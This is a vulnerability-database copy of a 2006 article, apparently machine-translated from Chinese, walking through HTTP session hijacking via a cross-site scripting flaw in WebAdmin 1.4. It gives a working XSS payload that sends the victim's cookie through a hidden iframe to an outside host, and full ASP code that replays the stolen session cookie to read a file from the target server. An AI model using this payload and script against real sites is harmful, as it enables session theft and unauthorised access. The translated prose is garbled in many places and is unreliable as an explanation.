Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200610359
HistoryJul 12, 2006 - 12:00 a.m.

Cross-site achieve HTTP session hijacking-vulnerability warning-the black bar safety net

2006-07-1200:00:00
佚名
www.myhack58.com
8
JSON

A Web application is by 2 ways to determine and keep track of different users: a Cookie or Session also called session-Cookie is. Wherein the Cookie is stored on the local computer, the expiration time is very long, so for the Cookie of the means of attack is generally to steal user Cookies and then forge a Cookie to impersonate the user; and the Session due to its presence in the service end, with the session cancellation and failure soon expired, often difficult to use. So in General Session authentication than Cookie authentication security.

Of course, the Session is difficult to use is not equal to can not use, this article will go through a small example to achieve a simple HTTP session hijacking.

Or in ASP, for example, the ASP program is how to get the client Session? By capture can be found in the HTTP request’s Cookie field has a ASPSESSIONIDXXXXXXXX X is a random alphanumeric value, the ASP program is through this value judgment Session. If we give the administrator of the ASPSESSIONIDXXXXXXXX and their values, and in this session before the end of the Submit to the server, then our identity is the administrator!

That how to get Session? The answer is across the station. Because the JavaScript document. cookie()method the Cookie is read out, of course also includes a session type Cookie.

If you are concerned about Web Security, I believe you will see through the recording of cross-site get Cookies script program, we also need a similar program, but the function is not recorded, but immediately forwarded because the current session at any time may be due to the Administrator’s exit and failure to. This program can be used in ASP, PHP, Perl or even C to achieve, I still use the ASP. J

To write this program, you must also want to attack the program is quite understand, because you have to submit various requests. So now the first look of the present embodiment is cross-site program.

Very honored, I checked WebAdmin 1.4, Hey, write your own program yourself for sure the most clear where there is vulnerability. Oh, a brief overview, the WebAdmin is a ASP. Net under the webshell, use the Session authentication, the 1.4 version of the Cross-Station exists in the directory browse the URL Figure 1. The!

So I was in the src to construct such a path:“E:<script>a=‘<iframe width=0 height=0 src=http://www. 0x54. org/test/cc. asp? a=’;a%2B=escape(document. cookie);a%2B=‘></iframe>’;document. write(a);</script>”. 这 段 代码 就是 把 当前 cookie 作为 参数 提交 给 www.0x54.org/test/cc.asp 文件 the.

cc. the asp file reads as follows:

|

<%

'only for test with CSS

str = request(“a”)

Set xPost = CreateObject(“Msxml2. ServerXMLHTTP”)

xPost. Open “GET”, “http://222.210.115.125:813/webadmin.aspx?action=edit&amp;src=E:\MyWeb\webadmin. aspx”, False

xPost. setRequestHeader “Cookie”,str

xPost. Send()

Set sGet = CreateObject(“ADODB. Stream”)

sGet. Mode = 3

sGet. Type = 1

sGet. Open()

sGet. Write(xPost. responseBody)

sGet. SaveToFile Server. MapPath(“a.txt”),2

set sGet = nothing

Set xPOST=nothing

%>

The file purpose is to get the admin Session and use the WebAdmin file edit View 2 2 2. 2 1 0. 1 1 5. 1 2 5 is to attack the Web server, in fact, is my present machine. the E:\MyWeb\webadmin. aspx file content and save the contents to the local a. txt file. Data submitted using the ServerXMLHTTP component, it is with the XMLHTTP there are similarities, there are also similarities and differences, specific can look at the ServerXMLHTTP vs the XMLHTTP Protocol.

Ready, the first landing WebAdmin and then access the constructed cross-site URL, Oh, 然后去看http://www.0x54.org/test/a.txt get the content as shown below:!

You can also try to directly access the cc. asp, huh, to generate a. txt will be a login screen of the source file.

Haha, now warmly celebrate the HTTP session hijacking to test the successful conclusion of the overall implementation of one such attack difficulty is still very large, but then again, in the technology of this field in addition to Copy other people’s code, there is no need to work hard to do good things?

JSON